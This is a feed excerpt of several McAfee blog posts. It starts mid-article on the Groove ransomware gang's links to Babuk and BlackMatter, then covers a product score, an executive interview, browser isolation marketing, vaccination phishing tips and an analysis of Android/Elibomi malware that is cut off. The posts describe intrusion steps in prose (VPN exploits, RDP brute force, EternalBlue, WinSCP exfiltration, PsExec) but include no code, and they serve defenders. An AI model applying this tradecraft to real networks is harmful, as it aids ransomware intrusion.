The name Darkside might sound more familiar than Orange but, as we saw with the naming of RAMP, TetyaSluha is one for cybercrime sentiment, so there is almost certainly some hidden meaning behind it.

Based on ATR’s previous research, we believe the name Orange was chosen as a tribute to REvil/GandCrab. People familiar with those campaigns have likely heard of the actor UNKN’. However, there was a less well known REvil affiliate admin named Orange. A tribute seems fitting if Tetyasluha isn’t the notorious Orange as that moniker is tied to some successful ransomware families, GandCrab and REvilthat shaped the RaaS ecosystem as we know it today. 

In the past, UNKN was linked to several other monikers, however Orange was hardly mentioned since there wasn’t a matching public handle used on any particular cybercrime forum.  However, REvil insiders will recognize the name Orange as one of their admins.

Based on ATR’s closed-source underground research, we believe with a high level of confidence, that UNKN was indeed linked to the aforementioned accounts, as well as the infamous “Crab”handle used by GandCrab. Crab was one of the two affiliate-facing accounts that the GandCrab team had (The other being Funnycrab). We believe with a high level of confidence that after the closure of GandCrab, the individual behind the Funnycrab account changed to the account name to Orange and continued operations with REvil, with only a subset of skilled GandCrab affiliates, (as described in our Virus Bulletin 2019 whitepaper) since GandCrab grew too big and needed to shed some weight.

The posting in figure 5 is also shedding some light on the start of the Groove Gang, their relationship to Babuk and, subsequently, BlackMatter.

Groove Gang

In the post from Figure 5, “Orange” also claims to have always had a small group of people that the group collaborates with. Additionally, the actor claims that the name has not been mentioned in the media before, comparing the group to the Israeli secret service group Mossad. The group’s comparison to Mossad is extremely doubtful at best, given the drama that has publicly played out. Groove claims several of Babuk’s victims, including the Metropolitan Police Department, brought them a lot of attention. The several mentions to Babuk isn’t by mistake: we have evidence the two groups also have connections, which we’ve pieced together from examining the behavior of — and particularly the fallout between — the two groups.

Babuk’s Fallout

Originally, the Babuk gang paid affiliates by each victim they attacked. Yet on April 30, it was reported that the gang suddenly had stopped working with affiliates, including the act of encrypting a victim’s system. Instead, their focus shifted to data exfiltration and extortion of targeted organizations. That was followed by the group releasing the builder for the old versions of its ransomware as it pivoted to a new one for themselves.

The attention that Babuk drew by hacking and extorting the Metropolitan Police Department meant their brand name became widely known. It also meant that more firms and agencies were interested in finding out who was behind it. This kind of heat is unwanted by most gangs, as any loose ends that are out there can come back to bite them.

Then, on September 3, the threat actor with the handle ‘dyadka0220’ stated that they were the principal developer of Babuk ransomware and posted what they claimed was the Babuk ransomware source code. They claimed the reason they were sharing everything was due to being terminally ill with lung cancer.

Figure 6. Dyadka0220 was possibly the developer that Orange hinted at in the posting (Figure 5) mentioned above.

On September 7, the Groove gang responded with a blog on their own website, titled “Thoughts about the meaning”, which rhymes in Russian. In this blog, the gang (allegedly) provides information on several recent happenings. Per their statement, the illness of ‘dyadka0220’ is a lie. Additionally, their response alleges that the Groove gang never created the Babuk ransomware themselves, but worked with someone else to produce it.

The validity of the claims in Groove’s latest blog is hard to determine, although this does not matter too much: the Babuk group, including affiliates, had a fallout that caused the group to break up, causing the retaliation of several (ex-)members.

Observed Behavior

The ATR team has covered Babuk multiple times. The first blog, published last February, covers the initial observations of the group’s malware. The second blog, published last July, dives into the ESXi version of the ransomware and its issues. The group’s tactics, techniques, and procedures (TTPs) are in-line with commonly observed techniques from ransomware actors. The deployment of dual-use tools, which can be used for both benign and malicious purposes, is difficult to defend against, as intent is an unknown term for a machine. Together with other vendors we have narrowed down some of the TTPs observed by the Groove gang.

Initial Access

The actor needs to get a foothold within the targeted environment. The access can be bought, in terms of stolen (yet valid) credentials, or direct access in the form of a live backdoor on one or more of the victim’s systems. Alternatively, the actor can exploit publicly facing infrastructure using a known or unknown exploit. To ATR’s understanding, the latter has been used several times by exploiting vulnerable VPN servers.

Lateral Movement, Discovery and Privilege Escalation

Moving around within the network is an important step for the actor, for two reasons. Firstly, it allows the attacker to find as much data as possible, which is then exfiltrated. Secondly, access to all machines is required in order to deploy the ransomware at a later stage. By encrypting numerous devices at once, it becomes even harder to control the damage from a defender’s point of view. The actor uses commonly known tools, such as Ad-Find and NetScan, to gather information on the network. Based on the gathered information, the actor will move laterally through the network. One of the most frequently observed methods by this actor to do so, is by using RDP.

To work with more than user-level privileges, the actor has a variety of options to escalate their privilege to a domain administrator. Brute forcing RDP accounts, the dumping of credentials, and the use of legacy exploits such as EternalBlue (CVE-2017-0144), are ways to quickly obtain access to one or more privileged accounts. Once access to these systems is established, the next phase of the attack begins.

Data Exfiltration and Ransomware Deployment

The actor navigates through the machines on the network using the earlier obtained access. To exfiltrate the collected data, the attacker uses WinSCP. Note that other, similar, tools can also be used. Once all relevant data has been stolen, the attacker will execute the ransomware in bulk. This can be done in a variety of ways, ranging from manually starting the ransomware on the targeted machines, scheduling a task per machine, or using PsExec to launch the ransomware.

Linking Groove to Babuk and BlackMatter

As discussed above, there was a fallout within Babuk. From that fallout, a part of the group stayed together to form Groove. The server that Babuk used, which we will refer to as the “wyyad” server due to the ending of the onion URL, rebranded in late August 2021. The similarities can be seen in the two screenshots below.

Figure 7. The changes to the landing page from Babuk to Groove

Aside from this, data from old Babuk victims is still hosted on this server. The ATR team found, among others, leaks that belong to:

  • a major US sports team,
  • a British IT service provider,
  • an Italian pharmaceutical company,
  • a major US police department,
  • a US based interior shop.

All these victims have previously been claimed by (and attributed to) Babuk.

Another gang, known as BlackMatter, uses a variety of locations to host their extorted files, which can be done out of convenience or to avoid a single notice and takedown to remove all offending files. Additionally, the ATR team assumes, with medium confidence, that different affiliates use different hosting locations.

The data of one of the BlackMatter gang’s victims, a Thai IT service provider, is stored on the “wyyad” server. As such, it can mean that the Groove gang worked as an affiliate for the BlackMatter gang. This is in line with their claim to work with anybody, as long as they profit from it. The image below shows the BlackMatter leak website linking to the “wyyad” server.

Figure 8. screenshot of BlackMatter, where the data is stored on the Groove server

The Groove gang’s website contains, at the time of writing, a single leak: data from a German printing company. Even though the website is accessible via a different address, the leaked data is stored on the “wyyad” server.

Figure 9. Another Groove victim but stored on their own page

The affected company does not meet BlackMatter’s “requirements,” the group has said it only goes after companies that make more than $US 100 million. This company’s annual revenue is estimated at $US 75 million, as seen in the below screenshot.

Figure 10. Posting on the Exploit forum by BlackMatter

At the end of Orange’s announcement comes a call to action and collaboration: “GROOVE is first and foremost an aggressive financially motivated criminal organization dealing in industrial espionage for about two years. RANSOMWARE is no more than an additional source of income. We don’t care who we work with and how. You’ve got money? We’re in”.

The group’s primary goal, making money, is not limited to ransomware. Inversely, ransomware would be the cherry on top. This is yet another indication of the ransomware group’s shift to a less hierarchical set-up and a more fluid and opportunistic network-based way of working.

In the Groove gang’s blog on September 7, a reference is made with regards to BlackMatter, and its links to DarkSide. If true, these insights show that the Groove gang has insider knowledge of the BlackMatter gang. This makes the collaboration between Groove and BlackMatter more likely. If these claims are false, it makes one wonder as to why the Groove gang felt the need to talk about other gangs, since they seem to want to make a name for themselves.

Due to the above outlined actions ATR believes, with high confidence, that the Groove gang is a former affiliate or subgroup of the Babuk gang, who are willing to collaborate with other parties, as long as there is financial gain for them. Thus, an affiliation with the BlackMatter gang is likely.


Ever since Ransomware-as-a-Service became a viable, and highly profitable, business model for cybercriminals, it has operated in much the same way with affiliates being the sometimes underpaid workhorses at the bottom of a rigid pyramid shaped hierarchy.

For some affiliates there was an opportunity to become competent cybercriminals while, for many others, the lack of recompense and appreciation for their efforts led to ill-feeling. Combined with underground forums banning ransomware actors, this created the perfect opportunity for the threat actor known as Orange to emerge, with the Groove gang in tow, with the offer of new ways of working where an associate’s worth was based entirely on their ability to earn money.

Time will tell if this approach enhances the reputation of the Groove gang to the level of the cybercriminals they seem to admire. One thing is clear though; with the manifestation of more self-reliant cybercrime groups the power balance within the RaaS eco-climate will change from he who controls the ransomware to he who controls the victim’s networks.


We have compiled a list of TTPs based on older Babuk cases and some recent cases linked to Groove:

  • T1190: Exploit Public-Facing Application (VPN services)
  • T1003: OS Credential Dumping
  • 002: Valid Accounts: Domain Accounts
  • T1059: Command and Scripting Interpreter
  • T1021:002: SMB/Windows Admin Shares
  • T1210: Exploitation of Remote Services
  • T1087: Account Discovery
  • T1482: Domain Trust Discovery
  • T1562: Impair Defense
  • T1537: Transfer Data to Cloud Account
  • T1567: Exfiltration Over Web Service

If a partnership is achieved with a Ransomware family:

  • T1486 Data Encrypted for Impact

The post How Groove Gang is Shaking up the Ransomware-as-a-Service Market to Empower Affiliates appeared first on McAfee Blogs.

Stay on top of your online security with our Protection Score Wed, 08 Sep 2021 18:22:52 +0000

How protected am I online?  Customers often ask us some version of this question. It’s a good question and in the past, there was no direct...

The post Stay on top of your online security with our Protection Score appeared first on McAfee Blogs.


How protected am I online? 

Customers often ask us some version of this question. It’s a good question and in the past, there was no direct answer – only recommendations. For instance, we recommend online protection that goes beyond antivirus to include identity and privacy protection, as well as promoting safety best practices like using multi-factor authentication. We wondered if there was a simpler and easier way to advise customers how to better protect themselves. 

A recent survey shows how important online security has become to consumers. We found that 74% of you have concerns about keeping your information private online.  57% want to be more in control of their personal info online. And, since the pandemic started, 47% of online consumers feel unsafe compared to 29%. Simply put, customers are more conscious of their safety online than ever before, and eager to play an active role in their protection. 

It’s time for a new approach – meet the Protection Score. 

What is Protection Score? 

If you’re thinking this looks like a credit, fitness, sleep, or any of the other scores we now use to visualize and quantify aspects of our life, you’re on the right track. 

Your personalized Protection Score is a measure of your security online. The higher your score, the safer you are online. Your score will highlight any weaknesses in your security and help you fix them with easy step-by-step instructions. We’ll also let you know which features haven’t been setup so you can get the most out of your protection. 

Protection Score is the simple way to understand and act on your online security 

When we developed Protection Score the idea was to give customers a simple solution to better protect themselves and get the most from their subscription, including security tips to protect their identity, privacy, and devices, while also improving their online habits. We wanted it to be easy for anyone to: 

  • Protect any weak spots – Personalized feedback helps you improve your security and address any data breaches. 
  • See how safe you are online – Measure the strength of your online protection with a real-time evaluation. 
  • Make protection easy – Simple instructions make it easy to setup your protection so you can get the most out of your subscription. 
  • Get the most out of your subscription – Make sure you’re fully utilizing your McAfee security—we’ll let you know which features haven’t been setup. 

How do I improve my Protection Score? 

Now that we’ve talked about Protection Score generally, let’s look at how it works in practice. Your score is based on a few things, including setting up your McAfee protection, strengthening your security with our safety recommendations, and ensuring your personal info is safely monitored with Identity Protection.  

For example, if your information is exposed in a data breach your score may drop, but you can improve it by following our easy-to-follow remediation steps. Once you’ve completed those steps your score will go back up and you can be confident knowing you’re better protected online. 

A perfect score does not mean you’re perfectly safe, but it does mean that you’re doing an excellent job of preventing and managing risks. 

Why should I care about Protection Score? 

Your Protection Score is a great way to understand how safe you are at a glance. Additionally, improving your score ensures your life online is being protected by many of the safety features and benefits McAfee has to offer. For instance, the subscriber, John Smith, can see they’re fairly safe based on their score. However, it isn’t a perfect score and there are a few actions they could still take to improve it. In this case, adding their email and phone number to dark web monitoring – a crucial step in protecting their personally identifiable information online. 

Where can I find my Protection Score? 

Protection Score can be easily accessed* from your browser of choice on any device so you can review our guidance and take steps to improve your score from wherever you are. McAfee’s Protection Score is a first for the cybersecurity industry, but we’re not stopping there. We’re going to continue to improve the feature by adding more personalization and accessibility so you can enjoy your life online knowing exactly how protected you are.  

*Note that Protection Score is currently live in the US, Canada, Brazil, Australia, New Zealand, Japan, UK, Germany, France, Spain, and Italy. 

The post Stay on top of your online security with our Protection Score appeared first on McAfee Blogs.

Executive Spotlight: Q&A with Chief Public Policy Officer, Tom Gann Wed, 08 Sep 2021 15:00:25 +0000

I’m back at it again with another round of our executive blog series. This week I had the privilege to...

The post Executive Spotlight: Q&A with Chief Public Policy Officer, Tom Gann appeared first on McAfee Blogs.


I’m back at it again with another round of our executive blog series. This week I had the privilege to speak with Tom Gann, our Chief Public Policy officer and he had some interesting things to say on the cyber security issues that are shaping public policy dialogue in Washington DC and other capitals around the world, and much much more.

Q: What is one event in your life that made you who you are today?

Teaching tennis. I know that teaching tennis is not an event, it’s a sport. For me it was a business at a young age that helped to change my life.

I grew up in Palo Alto, CA, when the town was middle-class. I went to Gunn High School when the school was very good at tennis – they had 10 undefeated seasons. My parents were kind enough to pay for tennis lessons and while I was only a so-so tennis player, my tennis coach thought that I would be a good teacher. And so, starting in the 11th grade, I began teaching tennis for a tennis shop in Menlo Park called the Better Backhand. Then later, when I was at Stanford, I started my own business teaching lessons on private tennis courts which helped me pay for school and a car.

Through this experience, I learned how to become a professional and most importantly, how to relate to people while helping them learn something valuable. I am amazed that many of the things I learned from teaching tennis still guide me today: treating people well, empowering them, and striving to get things done that matter.

Q: What are the biggest cyber security issues shaping the public policy dialogue in Washington DC and other capitals around the world?

The reality today, and likely in the future, is that the bad guys have and will continue to have the advantage. Bad guys need to be right one time to get into a government or company environment. The good guys, playing defense, need to be right every time. This reality is made more challenging by the fact that today’s typical new, best-in-class cyber security solution is often out of date in two years because the bad guys are great at innovating. At the same time, unfortunately, many organizations are too slow or too distracted to ensure all their cyber security solutions work effectively together.

The threats from nation states, criminal organizations, and terrorist groups is only getting bigger as time goes on – meaning our challenge continually grows, shifts, and evolves. Today, these actors are perfecting a wide range of ransomware strategies to blackmail all types of organizations in the public and private sectors.

Responsible governments and citizens need to demand real change, they need to push non-compliant nation states to commit to a basic level of fair play. The public and private sectors also need to work together to create a firewall against these bad actors who use ransomware to achieve such strategic objectives as profit and intimidation.

Q: What is the true value cloud security has brought to the government contracting and federal sectors? Why is there so much hype around this technology?

Everyone is moving to the cloud – private and public sector organizations as well as folks at home. This trend makes sense because the cloud is cost effective, reliable, and highly secure. However, the key in this shift is to make sure that government agencies have the flexibility to rapidly work with private sector experts – the data center, the enterprise software, and the cyber security leaders – to ensure long term success. Too often, I have seen government agencies use outdated procurement rules and processes that bog down progress. This often results in cloud and data center deployments, particularly when government agencies host these infrastructures, being completed with last generation solutions.

At the same time, outdated contracting rules can limit the ability of agencies to field the most up to date cyber security solutions. This challenge is becoming a bigger deal as agencies deploy multiple cloud solutions. These many cloud implementations create targets of opportunity for hackers who exploit security gaps between and among clouds, meaning agencies need to be proactive to ensure that their move to the cloud is safe and effective. Policymakers need to step up to the plate and modernize procurement rules and processes. Such support will help government agencies work quicker and more effectively to serve our citizens who demand first-class service from their government.

Q: How can our organization be the best partner to government agencies moving forward?

It is all about trust. Without trust you have noting. Working with the government, a company, or your neighbor down the street is the same – it all depends on trust. This means doing what you say you will do and working to overdeliver on your commitments.


The post Executive Spotlight: Q&A with Chief Public Policy Officer, Tom Gann appeared first on McAfee Blogs.

Remote Browser Isolation: The Next Great Security Technology is Finally Attainable Tue, 07 Sep 2021 15:00:17 +0000

Security professionals and technologists old enough to remember renting movies at Blockbuster on Friday nights likely also remember a time...

The post Remote Browser Isolation: The Next Great Security Technology is Finally Attainable appeared first on McAfee Blogs.


Security professionals and technologists old enough to remember renting movies at Blockbuster on Friday nights likely also remember a time when the internet was a new phenomenon full of wonder and promise.  These same individuals probably view it through a more skeptical lens seeing it now as a cesspool of malware and great risk.  It’s also widely understood that no web security solution can offer perfect protection against the metaphorical minefield that is the internet.  This last statement, however, is being challenged by a new technology that is grasping at the title of perfect web security.  This mythical technology is Remote Browser Isolation, or RBI, and it can be argued that it does, in fact, provide its users with invincibility against web-based threats.

Remote Browser Isolation changes the playbook on web security in one very fundamental way: it doesn’t rely on detecting threats.  When a user tries to browse to a website, the RBI solution instantiates an ephemeral browser in a remote datacenter which loads all the requested content.  The RBI solution then renders the website into a dynamic visual stream that enables the user to see and safely interact with it.

Figure 1: How Remote Browser Isolation works.

User behavior can be controlled at a granular level, preventing uploads, downloads, and even copy & paste using the local clipboard.  When properly configured, absolutely none of the content from the requested site is loaded on the local client.  For this reason, it can be argued that it’s literally impossible for malware to be delivered to the local client.  Of course, the RBI solution’s ephemeral browser instance may be compromised, but it will be fully isolated from the organization’s valuable assets and data, rendering the attack harmless.  As soon as the user closes their local browser tab, the ephemeral browser is destroyed.

The value of this cannot be overstated.  The world is increasingly conducting its affairs through web browsers, and the challenge of detecting threats continues to increase at an exponential rate.  While there is great efficacy and value in the threat intelligence and malware detection capabilities of web security solutions today, the “cat & mouse” game being played with cybercriminals means that they’re simply never going to offer perfect protection.  Attackers often use zero-day threats coupled with domains registered perhaps within the past few minutes to compromise their victims, and these methods will too often succeed in circumventing any detection-based security measures.  The game-changing efficacy of RBI and the fact its inception was actually more than 10 years ago should bring an obvious question to mind – If it’s so great, why doesn’t every organization in the world use RBI today?  There are a few relevant answers to this, but one rises above all the rest: cost.

RBI’s method of instantiating remote web browsers for all users precludes the possibility of any implementation that is not expensive to deliver.  Consider the size of a modern enterprise, the number of users, the number of web browser tabs an average user keeps open, and then consider the amount of memory and CPU consumed by each of those tabs.  To mirror these resources in a remote datacenter will always be a costly proposition.  For this reason, many RBI solutions on the market today may literally consume the entire security budget allocated for each licensed user.  As prevalent as web-based threats are today and as effective as RBI’s protection may be, no security organization can dedicate most or all of their security budget to a single technology or even a single threat vector.

To better understand the cost problem and how it may be solved, let’s take a closer look at the two most common use cases for RBI.  The first and most common use case is handling uncategorized sites or sites with unknown risk, known as selective isolation.  As mentioned before, attackers will often use a site that was registered very recently to deliver their web-based threats to victims.  Therefore, organizations often want to block any site that has not been categorized by their web security vendor.  However, the problem is that many legitimate sites can be uncategorized resulting in unnecessary blocking that may impact business.  Managing such a policy is very tedious, and the user experience tends to suffer greatly.  RBI is an ideal solution to this problem where you can grant users access to these sites while maintaining a high level of security.  This situation calls for a selective use of RBI where trusted sites are filtered through more traditional means while only the unknown or high-risk sites are isolated.

The other common need for RBI is various groups of high-risk users.  Consider C-level executives who have access to highly sensitive information relating to business strategies, intellectual property, and other information that must remain private.  Another common example is IT administrators who have elevated privileges that could be devastating if their accounts were compromised.  In these scenarios, organizations may look to isolate all of the traffic for these users including even sites that are trusted.  Typically, this full isolation approach is reserved for only a subset of users who pose a particularly high risk if compromised.

In light of these two use cases, selective isolation and full isolation, let’s take a closer look at the cost of this invincibility-granting technology.  Let’s consider a hypothetical organization, Brycin International, who has a total of 10,000 users.  Brycin has identified 400 users who either have access to critical data or have elevated permissions and therefore require full-time isolation.  We will assume a street price of $100 per user for full time isolation totaling $40,000 for these users.  This seems like a reasonable cost considering the elevated risk a compromise would represent for any one of these users.  Brycin would also like to leverage selective isolation for the rest of the user population, or 9,600 users.  Some solutions may require purchasing a full license, but most offer a discounted license for selective isolation.  We will assume a generous discount of 60%, resulting in a total cost of $40 per user or $384,000 for the rest of the organization.  This gives us a total price tag of $424,000 for Brycin, or an average cost of $42.40 per user.

Not only is this a steep cost for our 10,000-user enterprise, but the cost does not at all align with the value or the cost to deliver the solution.  The 9,600 selective isolation users may represent 96% of the user population, but when you consider the fact that only a small percentage of their web traffic will actually be isolated – state-of-the-art web threat security stacks can detect as much as 99% of all threats, leaving 1% of all traffic to be isolated – they generate perhaps less than 20% of the isolated web traffic.  The full isolation users, while a minority of the license count, will represent the bulk of the isolated web traffic – a little more than 80%.  However, despite the fact that selective isolation users are responsible for such a small share of all isolated traffic and given the generous 60% discounted licensing, they are still by far the largest expense at over 90% of the total solution cost!  This ratio of cost to value simply will not align with the budget and goals of most security organizations.

Figure 2: The disproportionate relationship between RBI users, traffic load, and solution cost.

McAfee Enterprise has now upended this unfortunate paradigm by incorporating remote browser isolation technology natively into our MVISION Unified Cloud Edge platform.  McAfee Enterprise offers two licensing options for RBI: RBI for Risky Web and Full Isolation.  RBI for Risky Web uses an algorithm built by McAfee Enterprise to automatically trigger browser isolation for any site McAfee Enterprise determines to be potentially malicious.  This is designed to address the most common use case, selective isolation, and it is included at no additional cost for any Unified Cloud Edge customer.  Additionally, Full Isolation licenses can be purchased as an add-on for any users that require isolation at all times.  These Full Isolation licenses allow you to create your own policy dictating which sites are isolated or not for these users.

Now, let’s revisit Brycin International’s cost to deliver enterprise-wide RBI if they chose McAfee Enterprise.  As we saw earlier, despite the fact the selective isolation users generated less than 20% of the traffic, they represented over 90% of the total cost of the solution.  With McAfee Enterprise’s licensing model, these users would not require any additional licenses at all, reducing this cost to zero!  Now, Brycin only has to consider the Full Isolation add-on licenses for their 400 high-risk users, or $40,000 – this is now the entire cost for the enterprise-wide RBI deployment.  While $100 per user still may exceed the per-user security budget for Brycin, it is now diluted by the total user population, reducing the per-user cost of the RBI deployment from $42.40 to only $4.  This is a tremendous reduction in cost for equal or greater value, making RBI much more likely to fit into Brycin’s budget and overall security plans.

This may beg the question, “How can McAfee Enterprise do this?”  In short, as one of the most mature security vendors in the world, McAfee Enterprise has the most powerful threat intelligence and anti-malware capabilities in the market today.  McAfee Enterprise’s Global Threat Intelligence service leverages over 1 billion threat sensors around the world reducing the unknowns to an extremely small fraction of all web traffic.  In addition, its heuristics-based anti-malware technology is able to detect many zero-day malware variants.  More uniquely, the Gateway Anti-Malware engine offers inline, real-time, emulation-based sandboxing using behavioral analysis to identify never-before seen threats based on their behavior.  After analyzing the combined effectiveness of these technologies, we found that only a small percentage of web traffic could not be confidently identified as either safe or malicious – roughly 0.5%. This made the cost of delivering selective RBI for Risky Web something that could be easily absorbed without any additional cost to our customers.

Remote Browser Isolation is an absolute paradigm shift in how we can protect our most critical assets against web-based threats today.  While the benefits are tremendous, cost has been a significant barrier preventing this powerful defense from becoming a ubiquitous technology.  McAfee Enterprise has broken down this barrier by leveraging our superior threat intelligence to reduce the cost of delivering RBI and then passing this savings on to our customers.

Remote Browser Isolation

Remove the risk and enjoy worry-free web browsing with McAfee’s RBI.

View Now

The post Remote Browser Isolation: The Next Great Security Technology is Finally Attainable appeared first on McAfee Blogs.

How Fraudsters Are Fooling Users With This Proof of Vaccination Phishing Scam Fri, 03 Sep 2021 18:50:59 +0000

You open your laptop and see an email from a healthcare organization that you don’t recognize. The subject line reads “URGENT –...

The post How Fraudsters Are Fooling Users With This Proof of Vaccination Phishing Scam appeared first on McAfee Blogs.


You open your laptop and see an email from a healthcare organization that you don’t recognize. The subject line reads “URGENT – PROOF OF VACCINATION NEEDED.” Impulsively, you open the email and click on the link. You’re redirected to a website that asks you to enter your name, date of birth, Social Security Number, and a photo of your vaccine card. Scrambling, you enter the information and click “Submit.”  

As you continue to adapt your lifestyle to the ongoing public health precautions, it’s important to consider how these precautions can affect your digital health as well. According to the Washington Post, pandemic-related email scams are on the rise, especially with the delta variant surging. McAfee Labs’ April 2021 Threats Report found that COVID-19-themed cyber-attack detections increased 114% in Q3 and Q4 of 2020. Research also shows that COVID-19 phishing attempts in June 2021 increased 33%. With confusion around proof of vaccination and booster shots emerging, it’s likely that cybercriminals will take advantage.   

Phishing Scams Asking for Proof of Vaccination 

As employers re-evaluate their return-to-office plans, some are requiring proof of vaccination or negative COVID-19 test results. This creates a new opportunity for cybercriminals to exploit. Researchers have uncovered phishing emails disguised as human resources departments asking recipients to submit personally identifiable information about their vaccination status. Many of these types of emails contain links to fake login pages. If the recipient proceeds with entering their credentials and personal data, cybercriminals can use the consumer’s data to conduct credential stuffing attacks and hack their online profiles. This could lead to credit card fraud, data extraction, wire transfers, identity theft, and more.  

Phishing Scams Posing as Healthcare Organizations 

 With various organizations contacting individuals about potential virus exposure, testing and vaccination information, and other public health news, it’s important to remember that some of these organizations may not be what they say they are. That email from the healthcare company you’ve never heard of? It’s probably a cybercriminal in disguise. Some hackers are impersonating public health and government organizations, sending phishing emails in the hopes of collecting users’ names, Social Security Numbers, birthdates, and other valuable data. Criminals tend to sell this information on the dark web, making a profit while the recipients’ online safety is put in jeopardy.  

Guard Yourself Against Phishing  

As more news and recommendations for dealing with the pandemic continues to emerge, it’s important that you stay vigilant when it comes to protecting your digital wellness. After all, it’s just as important as your physical wellness! In addition to staying updated on the latest COVID-19-related scams, follow these tips to keep yourself secure from online threats like phishing scams:  

1. Verify the sender  

If you receive an email or text message from an organization that you’re unfamiliar with, do some sleuthing. Verify that the organization is legitimate. The same goes if you receive a message from an entity that you recognize. If your “HR department” or a “doctor’s office” contacts you and asks for personal information, reach out to them directly instead of replying directly or clicking on any links in the message. This can prevent you from interacting with a hacker in disguise.  

2. Look for misspellings or grammatical errors   

Oftentimes, hackers will use a URL for their spoofed website that is just one character off from the legitimate site. Before clicking on any website from an email asking you to act, hover over the link with your cursor. This will allow you to preview the URL and identify any suspicious misspellings or grammatical errors before navigating to a potentially dangerous website.  

3. Enable multi-factor authentication   

Multi-factor authentication requires that users confirm a collection of things to verify their identity—usually something they have, and a factor unique to their physical being—such as a retina or fingerprint scan. This can prevent a cybercriminal from using credential-stuffing tactics (where they will use email and password combinations to hack into online profiles) to access your network or account if your login details were ever exposed during a data breach and sold on the dark web.  

4. Sign up for an identity theft alert service  

An identity theft alert service warns you about suspicious activity surrounding your personal information, allowing you to jump to action before irreparable damage is done. McAfee Total Protection not only keeps your devices safe from viruses but gives you the added peace of mind that your identity is secure, as well.  

The post How Fraudsters Are Fooling Users With This Proof of Vaccination Phishing Scam appeared first on McAfee Blogs.

Phishing Android Malware Targets Taxpayers in India Fri, 03 Sep 2021 18:33:11 +0000

Authored by ChanUng Pak   McAfee’s Mobile Research team recently found a new Android malware, Elibomi, targeting taxpayers in India. The malware steals sensitive financial and private information via phishing by pretending...

The post Phishing Android Malware Targets Taxpayers in India appeared first on McAfee Blogs.


Authored by ChanUng Pak  

McAfee’s Mobile Research team recently found a new Android malware, Elibomi, targeting taxpayers in India. The malware steals sensitive financial and private information via phishing by pretending to be a tax-filing application. We have identified two main campaigns that used different fake app themes to lure in taxpayers. The first campaign from November 2020 pretended to be a fake IT certificate application while the second campaign, first seen in May 2021, used the fake tax-filing theme. With this discovery, the McAfee Mobile Research team has been able to update McAfee Mobile Security so that it detects this threat as Android/Elibomi and alerts mobile users if this malware is present in their devices. 

During our investigation, we found that in the latest campaign the malware is delivered using an SMS text phishing attack. The SMS message pretends to be from the Income Tax Department in India and uses the name of the targeted user to make the SMS phishing attack more credible and increase the chances of infecting the device. The fake app used in this campaign is designed to capture and steal the victim’s sensitive personal and financial information by tricking the user into believing that it is a legitimate tax-filing app. 

We also found that Elibomi exposes the stolen sensitive information to anyone on the Internet. The stolen data includes e-mail addresses, phone numbers, SMS/MMS messages among other financial and personal identifiable information. McAfee has reported the servers exposing the data and at the time of publication of this blog the exposed information is no longer available. 

Pretending to be an app from the Income Tax Department in India 

The latest and most recent Elibomi campaign uses a fake tax-filing app theme and pretends to be from the Income Tax Department from the Indian government. They even use the original logo to trick the users into installing the app. The package names (unique app identifiers) of these fake apps consist of a random word + another random string + imobile (e.g. “direct.uujgiq.imobile” and “olayan.aznohomqlq.imobile”). As mentioned before this campaign has been active since at least May 2021. 

Figure 1. Fake iMobile app pretending to be from the Income Tax Department and asking SMS permissions 

After all the required permissions are granted, Elibomi attempts to collect personal information like e-mail address, phone number and SMS/MMS messages stored in the infected device: 

Figure 2. Elibomi stealing SMS messages 

Prevention and defense 

Here are our recommendations to avoid being affected by this and other Android threats that use social engineering to convince users to install malware disguised as legitimate apps: 

  • Have a reliable and updated security application like McAfee Mobile Security installed in your mobile devices to protect you against this and other malicious applications. 
  • Do not click on suspicious links received from text messages or social media, particularly from unknown sources. Always double check by other means if a contact that sends a link without context was really sent by that person because it could lead to the download of a malicious application. 


Android/Elibomi is just another example of the effectiveness of personalized phishing attacks to trick users into installing a malicious application even when Android itself prevents that from happening. By pretending to be an “Income Tax” app from the Indian government, Android/Elibomi has been able to gather very sensitive and private personal and financial information from affected users which could be used to perform identify and/or financial fraud. Even more worryingly, the information was not only in cybercriminals’ hands, but it was also unexpectedly exposed on the Internet which could have a greater impact on the victims. As long as social engineering attacks remain effective, we expect that cybercriminals will continue to evolve their campaigns to trick even more users with different fake apps including ones related to financial and tax services. 

McAfee Mobile Security detects this threat as Android/Elibomi and alerts mobile users if it is present. For more information about McAfee Mobile Security, visit 

For those interested in a deeper dive into our research… 

Distribution method and stolen data exposed on the Internet 

During our investigation, we found the main distribution method of the latest campaign in one of the stolen SMS messages exposed in one of the C2 servers. The SMS body field in the screenshot below shows the Smishing attack used to deliver the malware. Interestingly, the message includes the victim’s name in order to make the message more personal and therefore more credible. It also urges the user to click on a suspicious link with the excuse of checking an urgent update regarding the victim’s Income Tax return: 

Figure 3. Exposed information includes the SMS phishing attack used to originally deliver the malware 

Elibomi not only exposes stolen SMS messages, but it also captures and exposes the list of all accounts logged in the infected devices: 

Figure 4. Example of account information exposed in one of the C2 servers

If the targeted user clicks on the link in the text message, a phishing page will be shown pretending to be from the Income Tax Department from the Indian government which addresses the user by its name to make the phishing attack more credible: 

Figure 5. Fake e-Filing phishing page pretending to be from the Income Tax Department in India 

Each targeted user has a different application. For example in the screenshot below we have the app “cisco.uemoveqlg.imobile” on the left and “komatsu.mjeqls.imobile” on the right: 

Figure 6. Different malicious applications for different users

During our investigation, we found that there are several variants of Elibomi for the same iMobile fake Income tax app. For example, some iMobile apps only have the login page while in others have the option to “register” and request a fake tax refund: 

Figure 7. Fake iMobile screens designed to capture personal and financial information 

The sensitive financial information provided by the tricked user is also exposed on the Internet: 

Figure 8. Example of exposed financial information stolen by Elibomi using a fake tax filling app 

Related Fake IT Certificate applications 

The first Elibomi campaign pretended to be a fake “IT Certificate” app was found to be distributed in November 2020.  In the following figure we can see the similarities in the code between the two malware campaigns: 

Figure 9. Code similarity between Elibomi campaigns 

The malicious application impersonated an IT certificate management module that is purposedly used to validate the device in a non-existent verification server. Just like the most recent version of Elibomi, this fake ITCertificate app requests SMS permissions but it also requests device administrator privileges, probably to make more difficult its removal. The malicious application also simulates a “Security Scan” but in reality what it is doing in the background is stealing personal information like e-mail, phone number and SMS/MMS messages stored in the infected device: 

Figure 10. Fake ITCertificate app pretending to do a security scan while it steals personal data in the background 

Just like with the most recent “iMobile” campaign, this fake “ITCertificate” also exposes the stolen data in one of the C2 servers. Here’s an example of a stolen SMS message that uses the same log fields and structure as the “iMobile” campaign: 

Figure 11. SMS message is stolen by the fake “ITCertificate” using the same log structure as “iMobile” 

Interesting string obfuscation technique 

